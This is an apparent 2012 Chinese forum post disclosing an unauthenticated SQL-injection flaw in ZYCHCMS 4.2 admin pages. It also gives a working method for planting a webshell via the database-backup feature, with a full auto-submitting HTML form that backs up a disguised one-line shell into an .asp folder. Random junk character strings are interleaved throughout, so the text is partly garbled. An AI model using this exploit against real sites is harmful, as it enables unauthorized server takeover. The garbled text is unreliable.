# D! D- \' h9 w9 y$ I R- T( R) e, w: E
4 Q% T4 J5 P+ T( p b9 G
+ C/ b& d5 E( q1 h影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)4 a- L- A$ J$ t. R0 F
①SQL注射漏洞- M/ ?2 ?2 ~+ w1 z( C7 h! {
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
; t6 P2 t! D" ~, j, ^ 漏洞原因:未过滤
9 F- S/ u/ ?: F+ l) m 漏洞代码:1 G p! O( I0 o* @$ o- ]
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
) t& x9 `- r6 M" l 修复方法:在文件开头加入代码
0 m$ |9 N, s) x. X8 _) A! h 3 J% _0 E6 r, ]1 s8 Z
! e: K6 l3 y$ a3 F$ ^9 e: R) W
②后台拿WBSHELL
% r$ U0 h4 ^" J! z- I! V 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。# x4 |. a* H( w" U' O' v @
这里在网上找了一个,改了下,将就着用。$ V8 A F& y9 z( F) M7 r
以下是代码本地提交代码/ o7 Z, {7 f; B! P" m
* U3 \4 g' [0 D) m; D, ~
* r f7 V4 i/ F& z. y6 v \ f
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
/ Z" c0 ~" x' F4 R <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
6 p7 e& B" A& n* f1 `# \. R <tr>
- I! e7 B* n0 H" o# Q8 A <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>4 i8 i( a* v$ ^7 e- ^1 n$ [
</tr>
% Z. K0 U& M- g) {7 U( V2 L' v. m <tr>$ R2 R) O" T: X4 S! I$ S u
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
( D( }+ g1 V4 c [7 L1 S </span>
/ N [% ]( Z8 }1 \ <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
+ Y# A. j3 \; X; Z( J* E4 F: _( ~! W6 s <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
" G; B+ N: ^/ _# n8 v5 B <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>; K( A( h% T0 L+ ]
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d, ]! E8 N- ^0 A
<div align=”left”>
) I9 [- X/ ~9 x, h <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />$ a9 F! ?. [9 q; O
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>6 U- n1 R6 U. i9 C( g, S
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
( D. k) I4 e" k% }6 ?7 h </div></td>
. a9 l& @ [* V </tr>, K: Z0 M4 ^! h1 d
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
$ \% G2 K1 g9 V# w$ W ]( ` <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>- c% k! O. f% e4 M) w
<td class=”td”><div align=”left”>8 y' w' a- c: Z, Y! O3 _
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
7 } A4 Y& P) Y7 P$ Q6 M [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>2 _2 @4 J1 k+ j* Y& R4 e
</tr>
/ A1 G: c5 N z; M7 i <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>; C0 y" U; X7 \& U2 y: ^
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>. [+ @ d9 ^/ P0 q/ W' u% j' I
<td class=”td”><div align=”left”>
1 [% _" W- w9 E+ H! N5 L# @! h5 A <input type=”submit” value=”确定备份” class=”btn”6 c0 a& ]) O6 a0 l: m' h
</div></td>
7 b7 n: `3 X, K3 O& V </tr>
1 g* E4 D$ H4 ^6 W' V# z </table></td></tr></form>
1 m. ^, P$ _/ J1 `2 {1 P# o8 N! T# p </table>6 W4 I8 g+ w8 Y
</td>
! C2 U. g- P9 h </tr>
9 W; z6 f( g" b </table>
/ h* H' I' m/ K1 C+ Q <script>4 A. [8 j. q( G! d" N
document.all.add.submit();
9 A+ m% }# `5 e </script>7 H9 ~4 I! }# E ^% e! N& K9 M u
2 c+ _6 f3 E1 _8 p
% c0 a% G2 z! e. c8 q) E( ^- w! N9 D3 b7 m+ k& Q; _* U
' e% r: s7 Y4 h: Q+ M. G! s
4 x6 W" ~* \5 s3 x6 ]3 J( D7 E" S. Z# A; _; Y5 z4 K( D
) e. I, e3 Q( X J( [; A+ j
5 s3 s1 \8 v1 t4 J w% X0 a9 v* L
+ T. k5 A; g: S. S) H3 R
. M- _, g3 l8 s8 {5 p5 l3 Z6 A$ ? |
发表于 2012-9-10 21:09:51
收藏
支持
反对